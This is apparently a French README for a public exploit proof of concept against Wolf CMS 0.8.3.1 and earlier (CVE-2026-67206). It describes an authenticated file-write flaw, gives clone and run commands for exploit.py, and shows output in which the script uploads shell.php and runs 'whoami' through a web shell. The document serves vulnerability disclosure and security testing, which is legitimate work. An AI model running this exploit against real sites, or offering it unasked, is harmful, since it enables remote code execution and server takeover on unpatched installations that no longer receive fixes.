
Exploit PoC pour Wolf CMS <= 0.8.3.1 : s'authentifie auprès de l'Admin, écrit un fichier PHP arbitraire dans /public via FileManagerController et exécute des commandes via un web shell.
Ce dépôt contient une preuve de concept (PoC) pour l'exploitation de la CVE-2026-67206
Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.
Une vulnérabilité d'écriture arbitraire de fichiers existe dans les versions de Wolf CMS jusqu'à la 0.8.3.1. Elle permet à un attaquant authentifié d'écrire des fichiers arbitraires malveillants dans le répertoire /public de la racine web via les fonctions create_file() et save() de FileManagerController.php. La fonction create_file() de FileManagerController.php ne valide pas les extensions de fichiers, permettant ainsi aux attaquants authentifiés d'écrire des scripts PHP malveillants et d'obtenir des privilèges d'exécution de code à distance.
Une analyse détaillée avec analyse du code source et démonstration de l'exploitation est disponible sur mon blog Medium.
Toutes les versions de Wolf CMS jusqu'à la 0.8.3.1 sont affectées. Le dépôt Wolf CMS a été archivé le 28 août 2021 et n'est plus activement maintenu. Aucun correctif n'existe actuellement pour cette vulnérabilité.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Connexion avec les identifiants fournis...
[+] Connexion réussie
[*] Création d'un fichier nommé shell.php...
[+] Création du fichier réussie
[*] Tentative d'écriture de la charge utile dans shell.php...
[+] Charge utile écrite avec succès !
[+] Le shell web est accessible avec la chaîne de requête 'cmd' à l'adresse http://127.0.0.1:8080/public/shell.php
[+] Test de la sortie de http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data